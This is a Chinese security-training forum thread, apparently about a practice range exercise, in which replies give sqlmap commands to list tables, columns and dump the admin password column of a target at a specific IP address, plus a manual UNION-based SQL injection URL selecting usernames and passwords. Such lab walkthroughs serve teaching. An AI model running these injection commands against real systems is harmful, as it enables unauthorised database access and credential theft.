靶场第一题用sqlmap怎么爆出用户名 密码

医生   ·   发表于 2018-12-6   ·   问题反馈求助区

公开课说会有sqlmap的语法合集整理下载以及一些其他的工具ppt整理这些,我用sqlmap但是我找不到用户密码 

打赏我,让我更有动力~

4 Reply   |  Until 2019-1-6 | 499 View

twalone
发表于 2018-12-7

等哈给你出炉一个

评论列表

  • 加载数据中...

编写评论内容

zongzi
发表于 2018-12-7

然后查猫舍的表名啊,输入命令:

sqlmap -u http://117.41.229.122:8003/?id=1 -D maoshe --tables

得到四个表:

再逐一查表的字段:首先是admin表

sqlmap -u http://117.41.229.122:8003/?id=1 -D maoshe -T admin --columns

password字段在这,然后就不用找其他表了,直接查password的内容:

sqlmap -u http://117.41.229.122:8003/?id=1 -D maoshe -T admin -C password --dump


评论列表

  • 加载数据中...

编写评论内容

east
发表于 2018-12-8

厉害了,学习了

评论列表

  • 加载数据中...

编写评论内容

luining0372
发表于 2019-1-6

http://117.41.229.122:8003/index.php?id=1 and 1=2 union select username,password from admin where username<>''

评论列表

  • 加载数据中...

编写评论内容
LoginCan Publish Content
返回顶部 投诉反馈

掌控者 © 2016 - 2020. All Rights Reserved. 掌控者

Powered by 掌控者